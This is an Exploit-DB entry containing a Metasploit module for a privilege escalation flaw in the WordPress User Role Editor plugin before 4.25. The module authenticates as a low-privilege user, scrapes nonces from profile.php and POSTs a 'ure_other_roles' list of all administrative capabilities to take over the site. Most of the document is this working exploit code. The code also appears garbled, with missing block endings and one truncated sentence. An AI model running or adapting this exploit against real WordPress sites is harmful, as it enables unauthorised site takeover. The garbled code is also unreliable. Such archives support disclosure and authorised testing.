WordPress Plugin User Role Editor < 4.25 - Privilege Escalation

EDB-ID: 44595
Author: Tomislav Paskalev
Published: 2018-05-06
Type: Webapps
Platform: PHP
Vulnerable App: N/A

 # This module requires Metasploit: https://metasploit.com/download 
# Current source: https://github.com/rapid7/metasploit-framework

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HTTP::Wordpress

def initialize(info = {})
'Name' => 'WordPress User Role Editor Plugin Privilege Escalation',
'Description' => %q{
The WordPress User Role Editor plugin prior to v4.25, is lacking an authorization
check within its update user profile functionality ("update" function, contained
within the "class-user-other-roles.php" module).
Instead of verifying whether the current user has the right to edit other users'
profiles ("edit_users" WP capability), the vulnerable function verifies whether the
current user has the rights to edit the user ("edit_user" WP function) specified by
the supplied user id ("user_id" variable/HTTP POST parameter). Since the supplied
user id is the current user's id, this check is always bypassed (i.e. the current
user is always allowed to modify its profile).
This vulnerability allows an authenticated user to add arbitrary User Role Editor
roles to its profile, by specifying them via the "ure_other_roles" parameter within
the HTTP POST request to the "profile.php" module (issued when "Update Profile" is
By default, this module grants the specified WP user all administrative privileges,
existing within the context of the User Role Editor plugin.
'Author' =>
'ethicalhack3r', # Vulnerability discovery
'Tomislav Paskalev' # Exploit development, metasploit module
'License' => MSF_LICENSE,
'References' =>
['WPVDB', '8432'],
['URL', 'https://www.wordfence.com/blog/2016/04/user-role-editor-vulnerability/']
'DisclosureDate' => 'Apr 05 2016',

OptString.new('TARGETURI', [true, 'URI path to WordPress', '/']),
OptString.new('ADMINPATH', [true, 'wp-admin directory', 'wp-admin/']),
OptString.new('CONTENTPATH', [true, 'wp-content directory', 'wp-content/']),
OptString.new('PLUGINSPATH', [true, 'wp plugins directory', 'plugins/']),
OptString.new('PLUGINPATH', [true, 'User Role Editor directory', 'user-role-editor/']),
OptString.new('USERNAME', [true, 'WordPress username']),
OptString.new('PASSWORD', [true, 'WordPress password']),
OptString.new('PRIVILEGES', [true, 'Desired User Role Editor privileges', 'activate_plugins,delete_others_pages,delete_others_posts,delete_pages,delete_posts,delete_private_pages,delete_private_posts,delete_published_pages,delete_published_posts,edit_dashboard,edit_others_pages,edit_others_posts,edit_pages,edit_posts,edit_private_pages,edit_private_posts,edit_published_pages,edit_published_posts,edit_theme_options,export,import,list_users,manage_categories,manage_links,manage_options,moderate_comments,promote_users,publish_pages,publish_posts,read_private_pages,read_private_posts,read,remove_users,switch_themes,upload_files,customize,delete_site,create_users,delete_plugins,delete_themes,delete_users,edit_plugins,edit_themes,edit_users,install_plugins,install_themes,unfiltered_html,unfiltered_upload,update_core,update_plugins,update_themes,ure_create_capabilities,ure_create_roles,ure_delete_capabilities,ure_delete_roles,ure_edit_roles,ure_manage_options,ure_reset_roles'])

# Detect the vulnerable plugin by enumerating its readme.txt file
def check
readmes = ['readme.txt', 'Readme.txt', 'README.txt']

res = nil
readmes.each do |readme_name|
readme_url = normalize_uri(target_uri.path, datastore['CONTENTPATH'], datastore['PLUGINSPATH'], datastore['PLUGINPATH'], readme_name)
vprint_status("Checking #{readme_url}")
res = send_request_cgi(
'uri' => readme_url,
'method' => 'GET'
break if res && res.code == 200

if res.nil? || res.code != 200
# The readme.txt file does not exist
return Msf::Exploit::CheckCode::Unknown

version_res = extract_and_check_version(res.body.to_s, :readme, 'plugin', '4.25', nil)
return version_res

def username

def password

# Search for specified data within the provided HTTP response
def check_response(res, name, regex)
res.body =~ regex
result = $1
if result
print_good("#{peer} - WordPress - Getting data - #{name}")
vprint_error("#{peer} #{res.body}")
fail_with("#{peer} - WordPress - Getting data - Failed (#{name})")
return result

# Run the exploit
def run
# Check if the specified target is running WordPress
fail_with("#{peer} - WordPress - Not Found") unless wordpress_and_online?

# Authenticate to WordPress
print_status("#{peer} - WordPress - Authentication - #{username}:#{password}")
cookie = wordpress_login(username, password)
fail_with("#{peer} - WordPress - Authentication - Failed") if cookie.nil?
store_valid_credential(user: username, private: password, proof: cookie)
print_good("#{peer} - WordPress - Authentication - OK")

# Get additional information from WordPress, required for the HTTP POST request (anti-CSRF tokens, user parameters)
url = normalize_uri(wordpress_url_backend, 'profile.php')
print_status("#{peer} - WordPress - Getting data - #{url}")
res = send_request_cgi({
'method' => 'GET',
'uri' => url,
'cookie' => cookie

if res and res.code == 200
wp_nonce = check_response(res, "_wpnonce", /name=\"_wpnonce\" value=\"(.+?(?=\"))\"/)
color_nonce = check_response(res, "color-nonce", /name=\"color-nonce\" value=\"(.+?(?=\"))\"/)
checkuser_id = check_response(res, "checkuser_id", /name=\"checkuser_id\" value=\"(.+?(?=\"))\"/)
nickname = check_response(res, "nickname", /name=\"nickname\" id=\"nickname\" value=\"(.+?(?=\"))\"/)
display_name = check_response(res, "display_name", /name=\"display_name\" id=\"display_name\"\>[\s]+\<option selected=\'selected\'\>(.+?(?=\<))\</)
email = check_response(res, "email", /name=\"email\" id=\"email\" value=\"(.+?(?=\"))\"/)
user_id = check_response(res, "user_id", /name=\"user_id\" id=\"user_id\" value=\"(.+?(?=\"))\"/)
fail_with("#{peer} - WordPress - Getting data - Server response (code #{res.code})")

# Send HTTP POST request - update the specified user's privileges
print_status("#{peer} - WordPress - Changing privs - #{username}")
res = send_request_cgi({
'method' => 'POST',
'uri' => url,
'vars_post' => {
'_wpnonce' => wp_nonce,
'_wp_http_referer' => URI::encode(url),
'from' => 'profile',
'checkuser_id' => checkuser_id,
'color-nonce' => color_nonce,
'admin_color' => 'fresh',
'admin_bar_front' => '1',
'first_name' => '',
'last_name' => '',
'nickname' => nickname,
'display_name' => display_name,
'email' => email,
'url' => '',
'description' => '',
'pass1' => '',
'pass2' => '',
'ure_other_roles' => datastore['PRIVILEGES'],
'action' => 'update',
'user_id' => user_id,
'submit' => 'Update+Profile'
'cookie' => cookie

# check outcome
if res and res.code == 302
print_good("#{peer} - WordPress - Changing privs - OK")
fail_with("#{peer} - WordPress - Changing privs - Server response (code #{res.code})")

# EoF

Related Posts